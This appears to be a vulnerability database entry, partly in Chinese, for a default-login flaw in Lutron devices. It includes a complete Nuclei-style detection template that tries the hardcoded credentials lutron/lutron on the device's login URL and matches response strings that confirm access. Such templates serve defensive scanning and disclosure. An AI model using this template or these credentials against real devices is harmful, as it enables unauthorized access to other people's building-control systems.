lutron-default-login: Lutron - Default Account

日期: 2025-08-01 | 影响软件: Lutron | POC: 已公开

漏洞描述

Multiple Lutron devices contain a default login vulnerability. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations.

PoC代码[已公开]

id: lutron-default-login

info:
  name: Lutron - Default Account
  author: geeknik
  severity: critical
  description: Multiple Lutron devices contain a default login vulnerability. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations.
  reference:
    - https://www.lutron.com
    - https://vulners.com/openvas/OPENVAS:1361412562310113206
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cwe-id: CWE-1391
  metadata:
    max-request: 1
  tags: default-login,lutron,iot,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/login?login={{username}}&password={{password}}"

    attack: pitchfork
    payloads:
      username:
        - lutron
      password:
        - lutron

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "LUTRON"
          - "DeviceIP"
          - "Get Database Info as XML"
        condition: and

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022053091d7d262010c241f0c56f17cbe600fb9c5264b0162b984e9ac2cd63875f710221008d9aafda4080f53ff10f2760b345a7d54d74584edd7c29f27508a35dbfd0961e:922c64590222798bb761d5b6d8e72950

相关漏洞推荐